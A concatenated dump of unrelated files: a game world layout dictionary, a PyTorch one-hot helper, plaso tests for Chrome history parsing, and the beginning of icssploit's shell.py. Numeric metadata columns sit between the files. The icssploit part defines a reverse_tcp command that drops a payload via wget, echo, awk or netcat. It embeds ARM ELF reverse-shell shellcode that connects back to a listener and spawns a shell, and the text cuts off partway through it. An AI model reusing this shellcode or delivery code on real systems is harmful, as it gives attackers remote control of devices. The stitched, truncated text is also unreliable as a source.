{'1152910301.05sdnaik0': {'Type': 'Locator Node','Name': 'portal_interior_1','GridPos': Point3(-606.498, -425.911, 232.255),'Hpr': VBase3(-161.778, 0.0, -180.0),'Pos': Point3(-236.144, -43.732, 21.034),'Scale': VBase3(1.0, 1.0, 1.0)},'1152910307.13sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_2','GridPos': Point3(-27.183, -186.116, 232.255),'Hpr': VBase3(26.445, 0.0, -180.0),'Pos': Point3(453.452, 255.559, 12.06),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-1143.784, -1199.552, 81.761),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/swamps/swampB'}},'1153868315.8sdnaik': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(29.967, 0.0, 0.0),'Objects': {'1153868315.8sdnaik0': {'Type': 'Locator Node','Name': 'portal_connector_1','Hpr': VBase3(126.22, 0.0, 0.0),'Pos': Point3(465.537, 517.058, 2.343),'Scale': VBase3(1.0, 1.0, 1.0)},'1153868315.8sdnaik1': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-155.156, -163.935, 227.03),'Hpr': VBase3(-148.231, 0.0, 0.0),'Pos': Point3(453.452, 255.559, 12.06),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-432.389, -1775.729, 86.948),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_swamp_cave'}},'1153868634.75sdnaik': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(-153.313, 0.0, 0.0),'Objects': {'1153868634.75sdnaik0': {'Type': 'Locator Node','Name': 'portal_connector_1','Hpr': VBase3(126.22, 0.0, 0.0),'Pos': Point3(465.537, 517.058, 2.343),'Scale': VBase3(1.0, 1.0, 1.0)},'1153868634.75sdnaik1': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-291.911, 214.833, 0.664),'Hpr': VBase3(-148.231, 0.0, 0.0),'Pos': Point3(453.452, 255.559, 12.06),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-1091.077, 1336.074, 129.211),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_swamp_cave'}},'1155864372.34sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864374.63sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864384.91sdnaik': {'Type': 'Cell Portal Area','Name': 'cell_spanish_town','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1155866758.05sdnaik': {'Type': 'Building Exterior','File': 'bilgewater_guildhall_interior_a','ExtUid': '1155866758.05sdnaik0','Hpr': VBase3(68.18, 0.0, 0.0),'Pos': Point3(506.389, 141.755, 45.292),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Name': 'English A','Door': 'models/buildings/shanty_guildhall_door','Interior': 'models/buildings/interior_shanty_guildhall','Model': 'models/buildings/english_corner_a'}},'1158184464.98sdnaik': {'Type': 'Building Exterior','File': 'rambleshack_building_int_tavern','ExtUid': '1158184464.98sdnaik0','Hpr': VBase3(-43.794, 0.0, 0.0),'Pos': Point3(560.901, 106.555, 41.918),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Name': '','Door': 'models/buildings/shanty_guildhall_door','Interior': 'models/buildings/interior_tavern','Model': 'models/buildings/shanty_tavern_exterior'}},'1158184594.03sdnaik': {'Type': 'Building Exterior','File': 'swamptest_interior_1','ExtUid': '1158184594.03sdnaik0','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(409.067, 155.856, 44.575),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Name': '','Door': 'models/buildings/shanty_guildhall_door','Interior': 'models/buildings/interior_shanty_guildhall','Model': 'models/buildings/english_a'}}},'Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864824.89sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864827.11sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1156280826.23sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1156280828.67sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1156281161.64sdnaik': {'Type': 'Island Game Area','File': 'SwampTemplateC','Hpr': VBase3(-36.598, 0.0, 0.0),'Objects': {'1156281161.64sdnaik0': {'Type': 'Locator Node','Name': 'portal_interior_1','GridPos': Point3(-113.557, -119.557, 123.863),'Hpr': VBase3(81.569, 0.0, 0.0),'Pos': Point3(-383.486, 124.706, 14.047),'Scale': VBase3(1.0, 1.0, 1.0)},'1156302222.63sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_2','GridPos': Point3(-2121.404, -709.755, 122.18),'Hpr': VBase3(135.469, 0.0, 0.0),'Pos': Point3(557.708, 254.891, 12.365),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-2816.118, 1584.312, 635.326),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/swamps/swampC'}},'1156281363.2sdnaik': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(-94.487, 0.0, 0.0),'Objects': {'1156281363.2sdnaik0': {'Type': 'Locator Node','Name': 'portal_connector_1','GridPos': Point3(-808.963, -680.48, 73.384),'Hpr': VBase3(-88.748, 0.0, 0.0),'Pos': Point3(-3.613, 0.304, 4.651),'Scale': VBase3(1.0, 1.0, 1.0)},'1156281363.2sdnaik1': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-684.414, -557.419, 68.431),'Hpr': VBase3(72.65, -1.426, -0.516),'Pos': Point3(-103.188, 135.024, 3.777),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-2717.734, -50.514, 446.686),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_swamp'}},'1158184411.67sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1158184420.17sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)}},'Visual': {'Model': 'models/islands/bilgewater_zero'}}},'Node Links': [],'Layers': {},'ObjectIds': {'1152909972.77sdnaik': '["Objects"]["1152909972.77sdnaik"]','1152910060.11sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910060.11sdnaik"]','1152910060.11sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910060.11sdnaik0"]','1152910301.05sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910301.05sdnaik"]','1152910301.05sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910301.05sdnaik"]["Objects"]["1152910301.05sdnaik0"]','1152910307.13sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910301.05sdnaik"]["Objects"]["1152910307.13sdnaik"]','1153868315.8sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868315.8sdnaik"]','1153868315.8sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868315.8sdnaik"]["Objects"]["1153868315.8sdnaik0"]','1153868315.8sdnaik1': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868315.8sdnaik"]["Objects"]["1153868315.8sdnaik1"]','1153868634.75sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868634.75sdnaik"]','1153868634.75sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868634.75sdnaik"]["Objects"]["1153868634.75sdnaik0"]','1153868634.75sdnaik1': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868634.75sdnaik"]["Objects"]["1153868634.75sdnaik1"]','1155864372.34sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864372.34sdnaik"]','1155864374.63sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864374.63sdnaik"]','1155864384.91sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]','1155864824.89sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864824.89sdnaik"]','1155864827.11sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864827.11sdnaik"]','1155866758.05sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1155866758.05sdnaik"]','1155866758.05sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1155866758.05sdnaik"]','1156280826.23sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156280826.23sdnaik"]','1156280828.67sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156280828.67sdnaik"]','1156281161.64sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281161.64sdnaik"]','1156281161.64sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281161.64sdnaik"]["Objects"]["1156281161.64sdnaik0"]','1156281363.2sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281363.2sdnaik"]','1156281363.2sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281363.2sdnaik"]["Objects"]["1156281363.2sdnaik0"]','1156281363.2sdnaik1': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281363.2sdnaik"]["Objects"]["1156281363.2sdnaik1"]','1156302222.63sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281161.64sdnaik"]["Objects"]["1156302222.63sdnaik"]','1158184411.67sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1158184411.67sdnaik"]','1158184420.17sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1158184420.17sdnaik"]','1158184464.98sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184464.98sdnaik"]','1158184464.98sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184464.98sdnaik"]','1158184594.03sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184594.03sdnaik"]','1158184594.03sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184594.03sdnaik"]'}}
| 5,430
| 10,813
| 0.679558
| 1,491
| 10,860
| 4.901408
| 0.18444
| 0.024357
| 0.024631
| 0.031746
| 0.614532
| 0.559797
| 0.490832
| 0.448823
| 0.380952
| 0.273946
| 0
| 0.297971
| 0.046961
| 10,860
| 2
| 10,813
| 5,430
| 0.408116
| 0
| 0
| 0
| 0
| 0
| 0.607126
| 0.300525
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d22105b96492401a62db6f44835ecf063df381d5
| 1,536
|
py
|
Python
|
CloudCast/src/utils/one_hot_encoder.py
|
holmdk/CloudCast
|
614ef77f08c5d12832ee5f9ba347f1d3fd67931a
|
[
"CC0-1.0"
] | 2
|
2021-12-21T03:03:03.000Z
|
2022-01-16T08:15:13.000Z
|
CloudCast/src/utils/one_hot_encoder.py
|
holmdk/CloudCast
|
614ef77f08c5d12832ee5f9ba347f1d3fd67931a
|
[
"CC0-1.0"
] | null | null | null |
CloudCast/src/utils/one_hot_encoder.py
|
holmdk/CloudCast
|
614ef77f08c5d12832ee5f9ba347f1d3fd67931a
|
[
"CC0-1.0"
] | 3
|
2021-04-24T15:14:28.000Z
|
2021-12-03T17:46:03.000Z
|
import torch
#adapted from http://jacobkimmel.github.io/pytorch_onehot/
def make_one_hot(labels, C=4):
'''
Converts an integer label torch.autograd.Variable to a one-hot Variable.
Parameters
----------
labels : torch.autograd.Variable of torch.cuda.LongTensor
N x 1 x H x W, where N is batch size.
Each value is an integer representing correct classification.
C : integer.
number of classes in labels.
Returns
-------
target : torch.autograd.Variable of torch.cuda.FloatTensor
N x C x H x W, where C is class number. One-hot encoded.
'''
one_hot = torch.cuda.FloatTensor(labels.size(0), C, labels.size(1), labels.size(2), labels.size(3)).zero_()
return one_hot.scatter_(1, labels.data.unsqueeze(1), 1)
def make_one_hot_reduced(labels, C=4):
'''
Converts an integer label torch.autograd.Variable to a one-hot Variable.
Parameters
----------
labels : torch.autograd.Variable of torch.cuda.LongTensor
N x 1 x H x W, where N is batch size.
Each value is an integer representing correct classification.
C : integer.
number of classes in labels.
Returns
-------
target : torch.autograd.Variable of torch.cuda.FloatTensor
N x C x H x W, where C is class number. One-hot encoded.
'''
one_hot = torch.FloatTensor(C, labels.size(0), labels.size(1)).zero_()
return one_hot.scatter_(0, labels.long().data.unsqueeze(0), 1)
| 30.117647
| 113
| 0.633464
| 221
| 1,536
| 4.339367
| 0.276018
| 0.062565
| 0.131387
| 0.095933
| 0.757039
| 0.709072
| 0.709072
| 0.709072
| 0.709072
| 0.709072
| 0
| 0.013974
| 0.254557
| 1,536
| 50
| 114
| 30.72
| 0.823581
| 0.616536
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d225b917b80e8b3a508a5c0294a48a7ddcfa40fa
| 10,269
|
py
|
Python
|
tests/parsers/sqlite_plugins/chrome.py
|
nnyx7/plaso
|
9b05ad200acc7f5ad1fae9788ff8409fea8af2f8
|
[
"Apache-2.0"
] | null | null | null |
tests/parsers/sqlite_plugins/chrome.py
|
nnyx7/plaso
|
9b05ad200acc7f5ad1fae9788ff8409fea8af2f8
|
[
"Apache-2.0"
] | null | null | null |
tests/parsers/sqlite_plugins/chrome.py
|
nnyx7/plaso
|
9b05ad200acc7f5ad1fae9788ff8409fea8af2f8
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Google Chrome History database plugin."""
from __future__ import unicode_literals
import unittest
from plaso.formatters import chrome as _ # pylint: disable=unused-import
from plaso.lib import definitions
from plaso.parsers.sqlite_plugins import chrome
from tests.parsers.sqlite_plugins import test_lib
class GoogleChrome8HistoryPluginTest(test_lib.SQLitePluginTestCase):
"""Tests for the Google Chrome 8 history SQLite database plugin."""
def testProcess(self):
"""Tests the Process function on a Chrome History database file."""
plugin = chrome.GoogleChrome8HistoryPlugin()
storage_writer = self._ParseDatabaseFileWithPlugin(
['History'], plugin)
self.assertEqual(storage_writer.number_of_warnings, 0)
# The History file contains 71 events (69 page visits, 1 file downloads).
self.assertEqual(storage_writer.number_of_events, 71)
events = list(storage_writer.GetEvents())
# Check the first page visited entry.
event = events[0]
self.CheckTimestamp(event.timestamp, '2011-04-07 12:03:11.000000')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_LAST_VISITED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = 'http://start.ubuntu.com/10.04/Google/'
self.assertEqual(event_data.url, expected_url)
expected_title = 'Ubuntu Start Page'
self.assertEqual(event_data.title, expected_title)
expected_message = (
'{0:s} ({1:s}) [count: 0] '
'Visit Source: [SOURCE_FIREFOX_IMPORTED] Type: [LINK - User clicked '
'a link] (URL not typed directly - no typed count)').format(
expected_url, expected_title)
expected_short_message = '{0:s} ({1:s})'.format(
expected_url, expected_title)
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
# Check the first file downloaded entry.
event = events[69]
self.CheckTimestamp(event.timestamp, '2011-05-23 08:35:30.000000')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_FILE_DOWNLOADED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = (
'http://fatloss4idiotsx.com/download/funcats/'
'funcats_scr.exe')
self.assertEqual(event_data.url, expected_url)
expected_full_path = '/home/john/Downloads/funcats_scr.exe'
self.assertEqual(event_data.full_path, expected_full_path)
expected_message = (
'{0:s} ({1:s}). '
'Received: 1132155 bytes out of: '
'1132155 bytes.').format(expected_url, expected_full_path)
expected_short_message = '{0:s} downloaded (1132155 bytes)'.format(
expected_full_path)
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
class GoogleChrome27HistoryPluginTest(test_lib.SQLitePluginTestCase):
"""Tests for the Google Chrome 27 history SQLite database plugin."""
def testProcess57(self):
"""Tests the Process function on a Google Chrome 57 History database."""
plugin = chrome.GoogleChrome27HistoryPlugin()
storage_writer = self._ParseDatabaseFileWithPlugin(
['History-57.0.2987.133'], plugin)
self.assertEqual(storage_writer.number_of_warnings, 0)
# The History file contains 2 events (1 page visits, 1 file downloads).
self.assertEqual(storage_writer.number_of_events, 2)
events = list(storage_writer.GetEvents())
# Check the page visit event.
event = events[0]
self.CheckTimestamp(event.timestamp, '2018-01-21 14:09:53.885478')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_LAST_VISITED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = (
'https://raw.githubusercontent.com/dfirlabs/chrome-specimens/master/'
'generate-specimens.sh')
self.assertEqual(event_data.url, expected_url)
expected_title = ''
self.assertEqual(event_data.title, expected_title)
expected_message = (
'{0:s} '
'[count: 0] '
'Type: [START_PAGE - The start page of the browser] '
'(URL not typed directly - no typed count)').format(expected_url)
expected_short_message = '{0:s}...'.format(expected_url[:77])
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
# Check the file downloaded event.
event = events[1]
self.CheckTimestamp(event.timestamp, '2018-01-21 14:09:53.900399')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_FILE_DOWNLOADED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = (
'https://raw.githubusercontent.com/log2timeline/l2tbinaries/master/'
'win32/plaso-20171231.1.win32.msi')
self.assertEqual(event_data.url, expected_url)
expected_full_path = '/home/ubuntu/Downloads/plaso-20171231.1.win32.msi'
self.assertEqual(event_data.full_path, expected_full_path)
expected_message = (
'{0:s} ({1:s}). '
'Received: 3080192 bytes out of: 3080192 bytes.').format(
expected_url, expected_full_path)
expected_short_message = '{0:s} downloaded (3080192 bytes)'.format(
expected_full_path)
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
def testProcess58(self):
"""Tests the Process function on a Google Chrome 58 History database."""
plugin = chrome.GoogleChrome27HistoryPlugin()
storage_writer = self._ParseDatabaseFileWithPlugin(
['History-58.0.3029.96'], plugin)
self.assertEqual(storage_writer.number_of_warnings, 0)
# The History file contains 2 events (1 page visits, 1 file downloads).
self.assertEqual(storage_writer.number_of_events, 2)
events = list(storage_writer.GetEvents())
# Check the page visit event.
event = events[0]
self.CheckTimestamp(event.timestamp, '2018-01-21 14:09:27.315765')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_LAST_VISITED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = (
'https://raw.githubusercontent.com/dfirlabs/chrome-specimens/master/'
'generate-specimens.sh')
self.assertEqual(event_data.url, expected_url)
expected_title = ''
self.assertEqual(event.title, expected_title)
expected_message = (
'{0:s} '
'[count: 0] '
'Type: [START_PAGE - The start page of the browser] '
'(URL not typed directly - no typed count)').format(expected_url)
expected_short_message = '{0:s}...'.format(expected_url[:77])
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
# Check the file downloaded event.
event = events[1]
self.CheckTimestamp(event.timestamp, '2018-01-21 14:09:27.200398')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_FILE_DOWNLOADED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = (
'https://raw.githubusercontent.com/log2timeline/l2tbinaries/master/'
'win32/plaso-20171231.1.win32.msi')
self.assertEqual(event_data.url, expected_url)
expected_full_path = '/home/ubuntu/Downloads/plaso-20171231.1.win32.msi'
self.assertEqual(event_data.full_path, expected_full_path)
expected_message = (
'{0:s} ({1:s}). '
'Received: 3080192 bytes out of: 3080192 bytes.').format(
expected_url, expected_full_path)
expected_short_message = '{0:s} downloaded (3080192 bytes)'.format(
expected_full_path)
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
def testProcess59(self):
"""Tests the Process function on a Google Chrome 59 History database."""
plugin = chrome.GoogleChrome27HistoryPlugin()
storage_writer = self._ParseDatabaseFileWithPlugin(
['History-59.0.3071.86'], plugin)
self.assertEqual(storage_writer.number_of_warnings, 0)
# The History file contains 2 events (1 page visits, 1 file downloads).
self.assertEqual(storage_writer.number_of_events, 2)
events = list(storage_writer.GetEvents())
# Check the page visit event.
event = events[0]
self.CheckTimestamp(event.timestamp, '2018-01-21 14:08:52.037692')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_LAST_VISITED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = (
'https://raw.githubusercontent.com/dfirlabs/chrome-specimens/master/'
'generate-specimens.sh')
self.assertEqual(event_data.url, expected_url)
expected_title = ''
self.assertEqual(event_data.title, expected_title)
expected_message = (
'{0:s} '
'[count: 0] '
'Type: [START_PAGE - The start page of the browser] '
'(URL not typed directly - no typed count)').format(expected_url)
expected_short_message = '{0:s}...'.format(expected_url[:77])
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
# Check the file downloaded event.
event = events[1]
self.CheckTimestamp(event.timestamp, '2018-01-21 14:08:51.811123')
self.assertEqual(
event.timestamp_desc, definitions.TIME_DESCRIPTION_FILE_DOWNLOADED)
event_data = self._GetEventDataOfEvent(storage_writer, event)
expected_url = (
'https://raw.githubusercontent.com/log2timeline/l2tbinaries/master/'
'win32/plaso-20171231.1.win32.msi')
self.assertEqual(event_data.url, expected_url)
expected_full_path = '/home/ubuntu/Downloads/plaso-20171231.1.win32.msi'
self.assertEqual(event_data.full_path, expected_full_path)
expected_message = (
'{0:s} ({1:s}). '
'Received: 3080192 bytes out of: 3080192 bytes.').format(
expected_url, expected_full_path)
expected_short_message = '{0:s} downloaded (3080192 bytes)'.format(
expected_full_path)
self._TestGetMessageStrings(
event_data, expected_message, expected_short_message)
if __name__ == '__main__':
unittest.main()
| 37.072202
| 77
| 0.711656
| 1,228
| 10,269
| 5.730456
| 0.144137
| 0.068211
| 0.068211
| 0.051158
| 0.884468
| 0.851357
| 0.851073
| 0.831178
| 0.816967
| 0.789541
| 0
| 0.053007
| 0.180641
| 10,269
| 276
| 78
| 37.206522
| 0.783337
| 0.102639
| 0
| 0.777778
| 0
| 0
| 0.219858
| 0.042335
| 0
| 0
| 0
| 0
| 0.169312
| 1
| 0.021164
| false
| 0
| 0.037037
| 0
| 0.068783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d271fcee0a3dd8fde9814b03fdd7230d51ece964
| 24,539
|
py
|
Python
|
icssploit/shell.py
|
tijldeneut/icssploit
|
e9c6c49fe69d0302b51021f476422dc5940d09bc
|
[
"BSD-2-Clause"
] | 20
|
2021-01-16T13:36:22.000Z
|
2022-03-23T08:00:41.000Z
|
icssploit/shell.py
|
tijldeneut/icssploit
|
e9c6c49fe69d0302b51021f476422dc5940d09bc
|
[
"BSD-2-Clause"
] | null | null | null |
icssploit/shell.py
|
tijldeneut/icssploit
|
e9c6c49fe69d0302b51021f476422dc5940d09bc
|
[
"BSD-2-Clause"
] | 7
|
2021-01-18T18:46:49.000Z
|
2021-09-10T06:37:49.000Z
|
import socket
import telnetlib
import http.server
import threading
from .printer import printer_queue
from icssploit.utils import (
print_info,
print_error,
print_success,
print_status,
random_text,
)
def shell(exploit, architecture="", method="", **params):
while 1:
while not printer_queue.empty():
pass
cmd = raw_input("cmd > ")
if cmd in ["quit", "exit"]:
return
c = cmd.split()
if len(c) and c[0] == "reverse_tcp":
if len(c) == 3:
lhost = c[1]
lport = c[2]
revshell = reverse_shell(exploit, architecture, lhost, lport)
if method == "wget":
revshell.wget(binary=params['binary'], location=params['location'])
elif method == "echo":
revshell.echo(binary=params['binary'], location=params['location'])
elif method == "awk":
revshell.awk(binary=params['binary'])
elif method == "netcat":
revshell.netcat(binary=params['binary'], shell=params['shell'])
else:
print_error("Reverse shell is not available")
else:
print_error("reverse_tcp <reverse ip> <port>")
else:
print_info(exploit.execute(cmd))
class HttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(self.server.content)
self.server.stop = True
def log_message(self, format, *args):
return
class HttpServer(http.server.HTTPServer):
def serve_forever(self, content):
self.stop = False
self.content = content
while not self.stop:
self.handle_request()
class reverse_shell(object):
arm = (
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00"
"\x00\x00\x74\x80\x00\x00\x34\x00\x00\x00\x70\x01\x00\x00\x02\x02\x00\x05\x34\x00\x20\x00"
"\x02\x00\x28\x00\x07\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80"
"\x00\x00\x18\x01\x00\x00\x18\x01\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00"
"\x18\x01\x00\x00\x18\x01\x01\x00\x18\x01\x01\x00\x0b\x00\x00\x00\x0b\x00\x00\x00\x06\x00"
"\x00\x00\x00\x80\x00\x00"
# <_start>:
"\x84\x70\x9f\xe5" # ldr r7, [pc, #132]
"\x02\x00\xa0\xe3" # mov r0, #2
"\x01\x10\xa0\xe3" # mov r1, #1
"\x00\x20\xa0\xe3" # mov r2, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x60\xa0\xe1" # mov r6, r0
"\x70\x50\x9f\xe5" # ldr r5, [pc, #112] ; 8104 <loop+0x50>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x6c\x50\x9f\xe5" # ldr r5, [pc, #108] ; 8108 <loop+0x54>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x10\x20\xa0\xe3" # mov r2, #16
"\x60\x70\x9f\xe5" # ldr r7, [pc, #96] ; 810c <loop+0x58>
"\x00\x00\x00\xef" # svc 0x00000000
"\x06\x00\xa0\xe1" # mov r0, r6
"\x03\x10\xa0\xe3" # mov r1, #3
# <loop>:
"\x01\x10\x51\xe2" # subs r1, r1, #1
"\x3f\x70\xa0\xe3" # mov r7, #63 ; 0x3f
"\x00\x00\x00\xef" # svc 0x00000000
"\xfb\xff\xff\x1a" # bne 80b4 <loop>
"\x44\x00\x9f\xe5" # ldr r0, [pc, #68] ; 8110 <loop+0x5c>
"\x00\x10\xa0\xe1" # mov r1, r0
"\x02\x20\x22\xe0" # eor r2, r2, r2
"\x04\x20\x2d\xe5" # push {r2} ; (str r2, [sp, #-4]!)
"\x38\x10\x9f\xe5" # ldr r1, [pc, #56] ; 8114 <loop+0x60>
"\x04\x10\x2d\xe5" # push {r1} ; (str r1, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x0b\x70\xa0\xe3" # mov r7, #11
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x00\xa0\xe3" # mov r0, #0
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\x00\xef" # svc 0x00000000
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\xa0\xe3" # mov r0, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x19\x01\x00\x00" # .word 0x00000119
"\x7f\x00\x00\x01" # .word 0x0100007f
"\x02\x00\x11\x5c" # .word 0x5c110002
"\x1b\x01\x00\x00" # .word 0x0000011b
